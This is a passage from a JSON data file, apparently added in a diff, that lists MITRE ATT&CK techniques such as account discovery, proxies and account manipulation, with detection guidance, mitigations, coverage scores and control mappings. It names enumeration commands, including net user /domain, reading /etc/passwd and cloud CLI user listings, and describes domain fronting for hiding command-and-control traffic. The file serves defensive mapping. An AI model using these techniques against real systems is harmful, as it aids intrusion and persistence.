[PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nIn cloud-based systems, native logging can be used to identify access to certain APIs and dashboards that may contain system information. Depending on how the environment is used, that data alone may not be useful due to benign use during normal operations.", + "platforms": [ + "IaaS", + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Command: Command Execution", + "Instance: Instance Metadata", + "Process: OS API Execution", + "Process: Process Creation" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [], + "cumulative_score": 0.8154490493333333, + "adjusted_score": 0.8154490493333333, + "has_car": true, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [], + "nist_controls": [], + "process_coverage": true, + "network_coverage": false, + "file_coverage": false, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1083", + "name": "File and Directory Discovery", + "description": "Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nMany command shell utilities can be used to obtain this information. Examples include dir, tree, ls, find, and locate.(Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the [Native API](https://attack.mitre.org/techniques/T1106).", + "url": "https://attack.mitre.org/techniques/T1083", + "tactics": [ + "Discovery" + ], + "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Collection and Exfiltration, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", + "platforms": [ + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Command: Command Execution", + "Process: OS API Execution", + "Process: Process Creation" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [], + "cumulative_score": 0.45511189957142856, + "adjusted_score": 0.45511189957142856, + "has_car": false, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [], + "nist_controls": [], + "process_coverage": true, + "network_coverage": false, + "file_coverage": false, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1087", + "name": "Account Discovery", + "description": "Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.", + "url": "https://attack.mitre.org/techniques/T1087", + "tactics": [ + "Discovery" + ], + "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nMonitor for processes that can be used to enumerate user accounts, such as net.exe and net1.exe, especially when executed in quick succession.(Citation: Elastic - Koadiac Detection with EQL)", + "platforms": [ + "Azure AD", + "Google Workspace", + "IaaS", + "Linux", + "Office 365", + "SaaS", + "Windows", + "macOS" + ], + "data_sources": [ + "Command: Command Execution", + "File: File Access", + "Process: Process Creation", + "User Account: User Account Metadata" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1087.001", + "name": "Account Discovery: Local Account", + "url": "https://attack.mitre.org/techniques/T1087/001", + "description": "Adversaries may attempt to get a listing of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.\n\nCommands such as net user and net localgroup of the [Net](https://attack.mitre.org/software/S0039) utility and id and groupson macOS and Linux can list local users and groups. On Linux, local users can also be enumerated through the use of the /etc/passwd file. On macOS the dscl . list /Users command can be used to enumerate local accounts.", + "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nMonitor for processes that can be used to enumerate user accounts, such as net.exe and net1.exe, especially when executed in quick succession.(Citation: Elastic - Koadiac Detection with EQL)", + "mitigations": [ + { + "mid": "M1028", + "name": "Operating System Configuration", + "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.", + "url": "https://attack.mitre.org/mitigations/M1028" + } + ] + }, + { + "tid": "T1087.002", + "name": "Account Discovery: Domain Account", + "url": "https://attack.mitre.org/techniques/T1087/002", + "description": "Adversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior.\n\nCommands such as net user /domain and net group /domain of the [Net](https://attack.mitre.org/software/S0039) utility, dscacheutil -q groupon macOS, and ldapsearch on Linux can list domain users and groups.", + "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n", + "mitigations": [ + { + "mid": "M1028", + "name": "Operating System Configuration", + "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.", + "url": "https://attack.mitre.org/mitigations/M1028" + } + ] + }, + { + "tid": "T1087.003", + "name": "Account Discovery: Email Account", + "url": "https://attack.mitre.org/techniques/T1087/003", + "description": "Adversaries may attempt to get a listing of email addresses and accounts. Adversaries may try to dump Exchange address lists such as global address lists (GALs).(Citation: Microsoft Exchange Address Lists)\n\nIn on-premises Exchange and Exchange Online, theGet-GlobalAddressList PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)\n\nIn Google Workspace, the GAL is shared with Microsoft Outlook users through the Google Workspace Sync for Microsoft Outlook (GWSMO) service. Additionally, the Google Workspace Directory allows for users to get a listing of other users within the organization.(Citation: Google Workspace Global Access List)", + "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", + "mitigations": [] + }, + { + "tid": "T1087.004", + "name": "Account Discovery: Cloud Account", + "url": "https://attack.mitre.org/techniques/T1087/004", + "description": "Adversaries may attempt to get a listing of cloud accounts. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application.\n\nWith authenticated access there are several tools that can be used to find accounts. The Get-MsolRoleMember PowerShell cmdlet can be used to obtain account names given a role or permissions group in Office 365.(Citation: Microsoft msolrolemember)(Citation: GitHub Raindance) The Azure CLI (AZ CLI) also provides an interface to obtain user accounts with authenticated access to a domain. The command az ad user list will list all users within a domain.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018) \n\nThe AWS command aws iam list-users may be used to obtain a list of users in the current account while aws iam list-roles can obtain IAM roles that have a specified path prefix.(Citation: AWS List Roles)(Citation: AWS List Users) In GCP, gcloud iam service-accounts list and gcloud projects get-iam-policy may be used to obtain a listing of service accounts and users in a project.(Citation: Google Cloud - IAM Servie Accounts List API)", + "detection": "Monitor processes, command-line arguments, and logs for actions that could be taken to gather information about cloud accounts, including the use of calls to cloud APIs that perform account discovery.\n\nSystem and network discovery techniques normally occur throughout an operation as an adversary learns the environment, and also to an extent in normal network operations. Therefore discovery data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.", + "mitigations": [ + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + }, + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + } + ] + } + ], + "mitigations": [ + { + "mid": "M1028", + "name": "Operating System Configuration", + "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.", + "url": "https://attack.mitre.org/mitigations/M1028" + } + ], + "cumulative_score": 0.6642973651542856, + "adjusted_score": 0.6642973651542856, + "has_car": false, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [ + "4.1,4.8,18.3,18.5" + ], + "nist_controls": [ + "CM-6", + "CM-7", + "SI-4" + ], + "process_coverage": true, + "network_coverage": false, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1090", + "name": "Proxy", + "description": "Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.\n\nAdversaries can also take advantage of routing schemes in Content Delivery Networks (CDNs) to proxy command and control traffic.", + "url": "https://attack.mitre.org/techniques/T1090", + "tactics": [ + "Command And Control" + ], + "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server or between clients that should not or often do not communicate with one another). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)\n\nConsider monitoring for traffic to known anonymity networks (such as [Tor](https://attack.mitre.org/software/S0183)).", + "platforms": [ + "Linux", + "Network", + "Windows", + "macOS" + ], + "data_sources": [ + "Network Traffic: Network Connection Creation", + "Network Traffic: Network Traffic Content", + "Network Traffic: Network Traffic Flow" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1090.001", + "name": "Proxy: Internal Proxy", + "url": "https://attack.mitre.org/techniques/T1090/001", + "description": "Adversaries may use an internal proxy to direct command and control traffic between two or more systems in a compromised environment. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use internal proxies to manage command and control communications inside a compromised environment, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between infected systems to avoid suspicion. Internal proxy connections may use common peer-to-peer (p2p) networking protocols, such as SMB, to better blend in with the environment.\n\nBy using a compromised internal system as a proxy, adversaries may conceal the true destination of C2 traffic while reducing the need for numerous connections to external systems.", + "detection": "Analyze network data for uncommon data flows between clients that should not or often do not communicate with one another. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)", + "mitigations": [ + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + } + ] + }, + { + "tid": "T1090.002", + "name": "Proxy: External Proxy", + "url": "https://attack.mitre.org/techniques/T1090/002", + "description": "Adversaries may use an external proxy to act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths to avoid suspicion.\n\nExternal connection proxies are used to mask the destination of C2 traffic and are typically implemented with port redirectors. Compromised systems outside of the victim environment may be used for these purposes, as well as purchased infrastructure such as cloud-based resources or virtual private servers. Proxies may be chosen based on the low likelihood that a connection to them from a compromised system would be investigated. Victim systems would communicate directly with the external proxy on the Internet and then the proxy would forward communications to the C2 server.", + "detection": "Analyze network data for uncommon data flows, such as a client sending significantly more data than it receives from an external server. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)", + "mitigations": [ + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + } + ] + }, + { + "tid": "T1090.003", + "name": "Proxy: Multi-hop Proxy", + "url": "https://attack.mitre.org/techniques/T1090/003", + "description": "To disguise the source of malicious traffic, adversaries may chain together multiple proxies. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source. A particular variant of this behavior is to use onion routing networks, such as the publicly available TOR network. (Citation: Onion Routing)\n\nIn the case of network infrastructure, particularly routers, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain within the Wide-Area Network (WAN) of the enterprise. By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001), adversaries can add custom code to the affected network devices that will implement onion routing between those nodes. This custom onion routing network will transport the encrypted C2 traffic through the compromised population, allowing adversaries to communicate with any device within the onion routing network. This method is dependent upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599) method in order to allow the adversaries to cross the protected network boundary of the Internet perimeter and into the organization’s WAN. Protocols such as ICMP may be used as a transport.", + "detection": "When observing use of Multi-hop proxies, network data from the actual command and control servers could allow correlating incoming and outgoing flows to trace malicious traffic back to its source. Multi-hop proxies can also be detected by alerting on traffic to known anonymity networks (such as [Tor](https://attack.mitre.org/software/S0183)) or known adversary infrastructure that uses this technique.\n\nIn context of network devices, monitor traffic for encrypted communications from the Internet that is addressed to border routers. Compare this traffic with the configuration to determine whether it matches with any configured site-to-site Virtual Private Network (VPN) connections the device was intended to have. Monitor traffic for encrypted communications originating from potentially breached routers that is addressed to other routers within the organization. Compare the source and destination with the configuration of the device to determine if these channels are an authorized Virtual Private Network (VPN) connections or other encrypted modes of communication. Monitor ICMP traffic from the Internet that is addressed to border routers and is encrypted. Few if any legitimate use cases exist for sending encrypted data to a network device via ICMP.", + "mitigations": [ + { + "mid": "M1037", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.", + "url": "https://attack.mitre.org/mitigations/M1037" + } + ] + }, + { + "tid": "T1090.004", + "name": "Proxy: Domain Fronting", + "url": "https://attack.mitre.org/techniques/T1090/004", + "description": "Adversaries may take advantage of routing schemes in Content Delivery Networks (CDNs) and other services which host multiple domains to obfuscate the intended destination of HTTPS traffic or traffic tunneled through HTTPS. (Citation: Fifield Blocking Resistent Communication through domain fronting 2015) Domain fronting involves using different domain names in the SNI field of the TLS header and the Host field of the HTTP header. If both domains are served from the same CDN, then the CDN may route to the address specified in the HTTP header after unwrapping the TLS header. A variation of the the technique, \"domainless\" fronting, utilizes a SNI field that is left blank; this may allow the fronting to work even when the CDN attempts to validate that the SNI and HTTP Host fields match (if the blank SNI fields are ignored).\n\nFor example, if domain-x and domain-y are customers of the same CDN, it is possible to place domain-x in the TLS header and domain-y in the HTTP header. Traffic will appear to be going to domain-x, however the CDN may route it to domain-y.", + "detection": "If SSL inspection is in place or the traffic is not encrypted, the Host field of the HTTP header can be checked if it matches the HTTPS SNI or against a blocklist or allowlist of domain names. (Citation: Fifield Blocking Resistent Communication through domain fronting 2015)", + "mitigations": [ + { + "mid": "M1020", + "name": "SSL/TLS Inspection", + "description": "Break and inspect SSL/TLS sessions to look at encrypted web traffic for adversary activity.", + "url": "https://attack.mitre.org/mitigations/M1020" + } + ] + } + ], + "mitigations": [ + { + "mid": "M1037", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.", + "url": "https://attack.mitre.org/mitigations/M1037" + }, + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + }, + { + "mid": "M1020", + "name": "SSL/TLS Inspection", + "description": "Break and inspect SSL/TLS sessions to look at encrypted web traffic for adversary activity.", + "url": "https://attack.mitre.org/mitigations/M1020" + } + ], + "cumulative_score": 1.668642857142857, + "adjusted_score": 1.668642857142857, + "has_car": false, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [ + "4.2,4.4,9.3,13.3,13.4,13.8" + ], + "nist_controls": [ + "AC-3", + "AC-4", + "CA-7", + "CM-2", + "CM-6", + "CM-7", + "SC-7", + "SC-8", + "SI-10", + "SI-15", + "SI-3", + "SI-4" + ], + "process_coverage": false, + "network_coverage": true, + "file_coverage": false, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1091", + "name": "Replication Through Removable Media", + "description": "Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.", + "url": "https://attack.mitre.org/techniques/T1091", + "tactics": [ + "Initial Access", + "Lateral Movement" + ], + "detection": "Monitor file access on removable media. Detect processes that execute from removable media after it is mounted or when initiated by a user. If a remote access tool is used in this manner to move laterally, then additional actions are likely to occur after execution, such as opening network connections for Command and Control and system and network information Discovery.", + "platforms": [ + "Windows" + ], + "data_sources": [ + "Drive: Drive Creation", + "File: File Access", + "File: File Creation", + "Process: Process Creation" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [ + { + "mid": "M1040", + "name": "Behavior Prevention on Endpoint", + "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.", + "url": "https://attack.mitre.org/mitigations/M1040" + }, + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + }, + { + "mid": "M1034", + "name": "Limit Hardware Installation", + "description": "Block users or groups from installing or using unapproved hardware on systems, including USB devices.", + "url": "https://attack.mitre.org/mitigations/M1034" + } + ], + "cumulative_score": 0.7306421572466668, + "adjusted_score": 0.7306421572466668, + "has_car": false, + "has_sigma": true, + "has_es_siem": false, + "has_splunk": false, + "cis_controls": [ + "2.3,2.5,4.1,7.7,10.3,18.3,18.5" + ], + "nist_controls": [ + "AC-3", + "AC-6", + "CM-2", + "CM-6", + "CM-8", + "MP-7", + "RA-5", + "SC-41", + "SI-3", + "SI-4" + ], + "process_coverage": true, + "network_coverage": false, + "file_coverage": true, + "cloud_coverage": false, + "hardware_coverage": true + }, + { + "tid": "T1092", + "name": "Communication Through Removable Media", + "description": "Adversaries can perform command and control between compromised hosts on potentially disconnected networks using removable media to transfer commands from system to system. Both systems would need to be compromised, with the likelihood that an Internet-connected system was compromised first and the second through lateral movement by [Replication Through Removable Media](https://attack.mitre.org/techniques/T1091). Commands and files would be relayed from the disconnected system to the Internet-connected system to which the adversary has direct access.", + "url": "https://attack.mitre.org/techniques/T1092", + "tactics": [ + "Command And Control" + ], + "detection": "Monitor file access on removable media. Detect processes that execute when removable media is mounted.", + "platforms": [ + "Linux", + "Windows", + "macOS" + ], + "data_sources": [ + "Drive: Drive Access", + "Drive: Drive Creation" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [ + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + }, + { + "mid": "M1028", + "name": "Operating System Configuration", + "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.", + "url": "https://attack.mitre.org/mitigations/M1028" + } + ], + "cumulative_score": 0.2909428571428571, + "adjusted_score": 0.2909428571428571, + "has_car": false, + "has_sigma": false, + "has_es_siem": false, + "has_splunk": false, + "cis_controls": [ + "2.3,2.5,4.1,4.8,10.3,18.3,18.5" + ], + "nist_controls": [ + "CM-2", + "CM-6", + "CM-7", + "CM-8", + "MP-7", + "RA-5", + "SI-3", + "SI-4" + ], + "process_coverage": false, + "network_coverage": false, + "file_coverage": false, + "cloud_coverage": false, + "hardware_coverage": true + }, + { + "tid": "T1095", + "name": "Non-Application Layer Protocol", + "description": "Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.(Citation: Wikipedia OSI) Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).\n\nICMP communication between hosts is one example.(Citation: Cisco Synful Knock Evolution)\n Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts; (Citation: Microsoft ICMP) however, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.", + "url": "https://attack.mitre.org/techniques/T1095", + "tactics": [ + "Command And Control" + ], + "detection": "Analyze network traffic for ICMP messages or other protocols that contain abnormal data or are not normally seen within or exiting the network.(Citation: Cisco Blog Legacy Device Attacks)\n\nAnalyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2) \n\nMonitor and investigate API calls to functions associated with enabling and/or utilizing alternative communication channels.", + "platforms": [ + "Linux", + "Network", + "Windows", + "macOS" + ], + "data_sources": [ + "Network Traffic: Network Traffic Content", + "Network Traffic: Network Traffic Flow" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [], + "mitigations": [ + { + "mid": "M1037", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.", + "url": "https://attack.mitre.org/mitigations/M1037" + }, + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + }, + { + "mid": "M1030", + "name": "Network Segmentation", + "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.", + "url": "https://attack.mitre.org/mitigations/M1030" + } + ], + "cumulative_score": 1.6914619047619046, + "adjusted_score": 1.6914619047619046, + "has_car": false, + "has_sigma": true, + "has_es_siem": true, + "has_splunk": true, + "cis_controls": [ + "4.2,4.4,4.5,7.6,7.7,12.2,12.8,13.3,13.4,13.8,18.2,18.3,13.10" + ], + "nist_controls": [ + "AC-3", + "AC-4", + "CA-7", + "CM-2", + "CM-6", + "CM-7", + "SC-7", + "SI-10", + "SI-15", + "SI-3", + "SI-4" + ], + "process_coverage": false, + "network_coverage": true, + "file_coverage": false, + "cloud_coverage": false, + "hardware_coverage": false + }, + { + "tid": "T1098", + "name": "Account Manipulation", + "description": "Adversaries may manipulate accounts to maintain access to victim systems. Account manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups. These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to bypass password duration policies and preserve the life of compromised credentials. In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain.", + "url": "https://attack.mitre.org/techniques/T1098", + "tactics": [ + "Persistence" + ], + "detection": "Collect events that correlate with changes to account objects and/or permissions on systems and the domain, such as event IDs 4738, 4728 and 4670.(Citation: Microsoft User Modified Event)(Citation: Microsoft Security Event 4670)(Citation: Microsoft Security Event 4670) Monitor for modification of accounts in correlation with other suspicious activity. Changes may occur at unusual times or from unusual systems. Especially flag events where the subject and target accounts differ(Citation: InsiderThreat ChangeNTLM July 2017) or that include additional flags such as changing a password without knowledge of the old password.(Citation: GitHub Mimikatz Issue 92 June 2017)\n\nMonitor for use of credentials at unusual times or to unusual systems or services. This may also correlate with other suspicious activity.\n\nMonitor for unusual permissions changes that may indicate excessively broad permissions being granted to compromised accounts.", + "platforms": [ + "Azure AD", + "Google Workspace", + "IaaS", + "Linux", + "Office 365", + "Windows", + "macOS" + ], + "data_sources": [ + "Active Directory: Active Directory Object Modification", + "Command: Command Execution", + "File: File Modification", + "Group: Group Modification", + "Process: Process Creation", + "User Account: User Account Modification" + ], + "is_subtechnique": false, + "supertechnique": null, + "subtechniques": [ + { + "tid": "T1098.001", + "name": "Account Manipulation: Additional Cloud Credentials", + "url": "https://attack.mitre.org/techniques/T1098/001", + "description": "Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment.\n\nAdversaries may add credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance) With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)\n\nIn infrastructure-as-a-service (IaaS) environments, after gaining access through [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries may generate or import their own SSH keys using either the CreateKeyPair or ImportKeyPair API in AWS or the gcloud compute os-login ssh-keys add command in GCP.(Citation: GCP SSH Key Add) This allows persistent access to instances within the cloud environment without further usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation: Expel Behind the Scenes)", + "detection": "Monitor Azure Activity Logs for Service Principal and Application modifications. Monitor for the usage of APIs that create or import SSH keys, particularly by unexpected users or accounts such as the root account.\n\nMonitor for use of credentials at unusual times or to unusual systems or services. This may also correlate with other suspicious activity.", + "mitigations": [ + { + "mid": "M1032", + "name": "Multi-factor Authentication", + "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.", + "url": "https://attack.mitre.org/mitigations/M1032" + }, + { + "mid": "M1030", + "name": "Network Segmentation", + "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.", + "url": "https://attack.mitre.org/mitigations/M1030" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + } + ] + }, + { + "tid": "T1098.002", + "name": "Account Manipulation: Exchange Email Delegate Permissions", + "url": "https://attack.mitre.org/techniques/T1098/002", + "description": "Adversaries may grant additional permission levels, such as ReadPermission or FullAccess, to maintain persistent access to an adversary-controlled email account. The Add-MailboxPermission [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlet, available in on-premises Exchange and in the cloud-based service Office 365, adds permissions to a mailbox.(Citation: Microsoft - Add-MailboxPermission)(Citation: FireEye APT35 2018)(Citation: Crowdstrike Hiding in Plain Sight 2018)\n\nAdversaries may also assign mailbox folder permissions through individual folder permissions or roles. Adversaries may assign the Default or Anonymous user permissions or roles to the Top of Information Store (root), Inbox, or other mailbox folders. By assigning one or both user permissions to a folder, the adversary can utilize any other account in the tenant to maintain persistence to the target user’s mail folders.(Citation: Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452)\n\nThis may be used in persistent threat incidents as well as BEC (Business Email Compromise) incidents where an adversary can assign more access rights to the accounts they wish to compromise. This may further enable use of additional techniques for gaining access to systems. For example, compromised business accounts are often used to send messages to other accounts in the network of the target business while creating inbox rules (ex: [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)), so the messages evade spam/phishing detection mechanisms.(Citation: Bienstock, D. - Defending O365 - 2019)", + "detection": "Monitor for unusual Exchange and Office 365 email account permissions changes that may indicate excessively broad permissions being granted to compromised accounts.\n\nEnable the UpdateFolderPermissions action for all logon types. The mailbox audit log will forward folder permission modification events to the Unified Audit Log. Create rules to alert on ModifyFolderPermissions operations where the Anonymous or Default user is assigned permissions other than None. \n\nA larger than normal volume of emails sent from an account and similar phishing emails sent from  real accounts within a network may be a sign that an account was compromised and attempts to leverage access with modified email permissions is occurring.", + "mitigations": [ + { + "mid": "M1032", + "name": "Multi-factor Authentication", + "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.", + "url": "https://attack.mitre.org/mitigations/M1032" + }, + { + "mid": "M1026", + "name": "Privileged Account 